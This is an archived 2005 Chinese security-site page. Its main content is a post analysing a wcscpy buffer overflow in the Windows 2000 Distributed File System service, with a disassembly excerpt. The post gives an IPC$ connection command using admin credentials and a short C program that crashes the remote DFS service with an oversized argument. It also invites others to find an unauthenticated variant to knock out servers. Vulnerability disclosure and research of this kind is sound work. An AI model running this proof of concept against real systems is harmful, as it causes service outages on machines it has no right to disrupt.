📄 2005320142627.htm
字号:
<form action="../../search.asp" method="post" name="searchLeftForm">
<tr bgcolor="CAF6F4" align="center">
<td height="25" bgcolor="#CC9900"><font color="#cc0000"><b>□
站 内 搜 索 □</b></font></td>
</tr>
<tr align="center">
<td style="line-height:150%" height=60> 请输入查询的字符串:<br>
<input name="search" type="text" class="button1" id="search" style="width:150">
<select name="seaguan" size="1" class="button1" id="seaguan" style="width:150">
<option value="">==> 综合查询 <==</option>
<option value="title">标题</option>
<option value="无">作者</option>
<option value="artical">内容</option>
<%call getNewsBoardTree()%>
</select>
</td>
</tr>
<tr align="center">
<td>
<input type="SUBMIT" name="Action" value=" 查 询 " class="button2">
<input type="RESET" name="Clear" value=" 重 写 " class="button2">
</td>
</tr>
<tr align="center">
<td height="10"></td>
</tr>
</form>
</table></td>
</tr>
<tr>
<td height="20"><table width="181" height="20" cellpadding="0" cellspacing="0">
<tr><td width="181" height="20" align="center" bgcolor="#CC9900">分类最新文章</td>
</tr>
<tr><td><a href=20054123340.htm target=_blank>木马、病毒防范之注册表权限设</a></td></tr><tr><td><a href=200533013627.htm target=_blank>灰鸽子病毒手工清除方法</a></td></tr><tr><td><a href=200533012111.htm target=_blank>巧妙的化解 分布式拒绝服务攻</a></td></tr><tr><td><a href=200533011312.htm target=_blank>反黑防黑——再谈防火墙及防火</a></td></tr><tr><td><a href=200533011220.htm target=_blank>Linux操作系统的防火墙配</a></td></tr><tr><td><a href=200533011011.htm target=_blank>独辟蹊径实现Linux下的局</a></td></tr><tr><td><a href=2005330199.htm target=_blank>网络安全防范 需要注意的十条</a></td></tr><tr><td><a href=2005320142933.htm target=_blank>SYMANTEC防火墙内核堆</a></td></tr><tr><td><a href=2005320142851.htm target=_blank>简单证书认证协议</a></td></tr><tr><td><a href=200532014278.htm target=_blank>浅析本机API</a></td></tr>
</table></td>
</tr>
<tr>
<td height="20"><table width="181" height="20" cellpadding="0" cellspacing="0">
<tr><td width="181" height="20" align="center" bgcolor="#CC9900">分类热门文章</td>
</tr>
<tr><td><a href=200533013627.htm target=_blank>灰鸽子病毒手工清除方法</a></td></tr><tr><td><a href=2005320142933.htm target=_blank>SYMANTEC防火墙内核堆</a></td></tr><tr><td><a href=2005320142553.htm target=_blank>建立主动性网络安全体系</a></td></tr><tr><td><a href=2005320142627.htm target=_blank>Distributed Fi</a></td></tr><tr><td><a href=2005320142851.htm target=_blank>简单证书认证协议</a></td></tr><tr><td><a href=200533012111.htm target=_blank>巧妙的化解 分布式拒绝服务攻</a></td></tr><tr><td><a href=200532014278.htm target=_blank>浅析本机API</a></td></tr><tr><td><a href=200533011011.htm target=_blank>独辟蹊径实现Linux下的局</a></td></tr><tr><td><a href=200533011312.htm target=_blank>反黑防黑——再谈防火墙及防火</a></td></tr><tr><td><a href=200533011220.htm target=_blank>Linux操作系统的防火墙配</a></td></tr>
</table></td>
</tr>
</table></td>
<td width="628" valign="top" scope="col"><table width="100%" border="0" align="center" cellspacing="0" cellpadding="5" bordercolordark="#FFFFFF" bordercolorlight="#000000" style="word-break:break-all;">
<tr>
<td width="100%">
</td>
</tr>
<tr>
<td width="100%">
<div align="center">
<p class="style7"><SPAN class=style1>Distributed File System服务远程溢出问题</SPAN></p>
<hr size="1" color="#0a778b" width="100%">
发布时间:2005-3-20 被阅览数:<SCRIPT src="../../counter.asp?id=362"></SCRIPT> 次 作者:无
</div>
</td>
</tr>
<tr>
<td width="100%"><p class="style6"><FONT face=Verdana>
<P><BR>1.前言:<BR> 最近在windows 2000 advanced server下研究Distributed File System服务的时候,在当中一个函数发现一个<BR>溢出,经过测试,发现需要远程通过目标机的管理员组成员和Distributed File System服务建立name pipe,才能发生<BR>溢出,不知道这样的问题,属于不属于安全漏洞呢?</P>
<P> 今天决定发出来给大家共同研究一下,说不定有可能其他高手发现不需要通过目标机的管理员组成员权限来进行<BR>溢出,那这个就算真正的安全问题了,而且危害性肯定也强了,那当然也记得给我发个信通知一下如何实现.:)</P>
<P><BR>2.问题细节:<BR> 这个溢出问题,是发生在Distributed File System服务里面的NetrDfsAddStdRootForced函数在处理第四个参数<BR>上面,这个第四个参数是会作为第五个参数传递给SetupStdDfs的,在这个函数里面调用wcscpy,问题出在这里没有进行<BR>边界检查,导致溢出的代码如下:</P>
<P>NetrDfsAddStdRootForced函数<BR>...............<BR> .text:0100A2B5 mov edi, [ebp+arg_C]<BR> .text:0100A2B8 test edi, edi<BR> .text:0100A2AF jz loc_100A373<BR>...............<BR> .text:0100A31F push edi<BR> .text:0100A320 push 1<BR> .text:0100A322 push [ebp+arg_8]<BR> .text:0100A325 lea eax, [ebp+var_214]<BR> .text:0100A32B push [ebp+arg_4]<BR> .text:0100A32E push eax<BR> .text:0100A32F call SetupStdDfs<BR>...............<BR> SetupStdDfs函数<BR>.text:01007FB4 push ebp<BR>.text:01007FB5 mov ebp, esp<BR>.text:01007FB7 sub esp, 658h<BR>.text:01007FBD push ebx<BR>.text:01007FBE mov ebx, ds:wcscpy<BR>.text:01007FC4 push esi<BR>.text:01007FC5 push edi<BR>.text:01007FC6 xor esi, esi<BR>.text:01007FC8 xor edi, edi<BR>.text:01007FCA cmp [ebp+arg_10], esi<BR>.text:01007FCD jnz short loc_1007FE2<BR>...............<BR>.text:01007FE2 loc_1007FE2:<BR>.text:01007FE2 push [ebp+arg_10]<BR>.text:01007FE5 lea eax, [ebp+var_43C]<BR>.text:01007FEB push eax<BR>.text:01007FEC call ebx ; wcscpy</P>
<P>调用流程为:</P>
<P>NetrDfsAddStdRootForced->SetupStdDfs->wcscpy</P>
<P><BR>3.溢出测试方法:</P>
<P>(1).先使用目标机器的管理员组成员建立一个ipc$连接<BR>net use \\目标机器ip\ipc$ 管理员组成员密码 /user:管理员组成员账号</P>
<P>(2).使用如下测试代码测试:<BR>#include <stdio.h><BR>#include <stdlib.h><BR>#include <windows.h><BR>#include <Lm.h><BR>#include <Lmdfs.h></P>
<P>#pragma comment(lib, "Netapi32.lib")</P>
<P>int main (void)<BR>{<BR>wchar_t a[]=L"\\\\ip\\"; //把ip替换为你的目标机器ip<BR>wchar_t b[4000];<BR>LPWSTR ServerName=a;<BR>LPWSTR RootShare=L"fzk";<BR>LPWSTR Comment=L"fzk";<BR>LPWSTR Store;<BR>int i;</P>
<P>for (i = 0; i< 2000;i++)<BR> wcscat(b, L"A");</P>
<P>Store = b;</P>
<P>if( NetDfsAddStdRootForced( ServerName, RootShare, Comment, Store) == NERR_Success)<BR> return TRUE;</P>
<P>else<BR> return FALSE;<BR>}</P>
<P>把以上代码存为test.cpp,运行cl test.cpp编译,然后执行test.exe,到这里应该目标机器的<BR>Distributed File System服务已经down掉了</P>
<P>4.附加信息:<BR>在MSDN发现NetDfsAddStdRootForced API在windows 2003已经被弃用了<BR>Distributed File System服务在windows 2000服务器下面是默认开放的<BR>如果有高手能实现不用任何权限来进行溢出,应该可以干掉很多windows 2000的服务器<BR>当然也记得通知我<BR>email:sysadm@21cn.com<BR>qq:1734398<BR>MSN:sysadm@21cn.com </FONT></P></p>
<p><img src="http://www.koyee.com/images/dgg.gif" height="70" width="587"> </p></td>
</tr>
<tr>
<td width="628" bordercolor="0" class="font1"><p>
<hr size="1" color="#0a778b" width="100%">
<table><tr><td width="269" align="center">上一篇: <a href=../78/2005320142553.htm title=建立主动性网络安全体系>建立主动性网络安全体系</a> </td>
<td width="285" align="center">下一篇: <a href=../90/200542823048.htm title=gew>gew</a></td>
</tr></table>
<hr size="1" color="#0a778b" width="100%">
<div align="right"> <a href="javascript:window.print()"><img src="../../images/printer.gif" width="16" height="14" border="0" align="absmiddle">打印本页</a> | <a href="javascript:window.close()"><img src="../../images/close.gif" width="14" height="14" border="0" align="absmiddle">关闭窗口</a> </div>
<p></p></td>
</tr>
</table></td>
</tr>
</table>
<TABLE height=62 cellSpacing=0 cellPadding=0 width="800"
align=center background=../../images/webtop_bg.gif
border=0>
<TBODY>
<TR>
<TD><div align="center" class="style4">Copyright @ 2004-2008 http://www.koyee.com 可以网络在线版权所有<br>
公司地址:江西南昌 电话:13879173467 邮编:330029<br>
email:chenxueyan9999@163.com</div></TD>
</TR></TBODY></TABLE>
</BODY></HTML>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -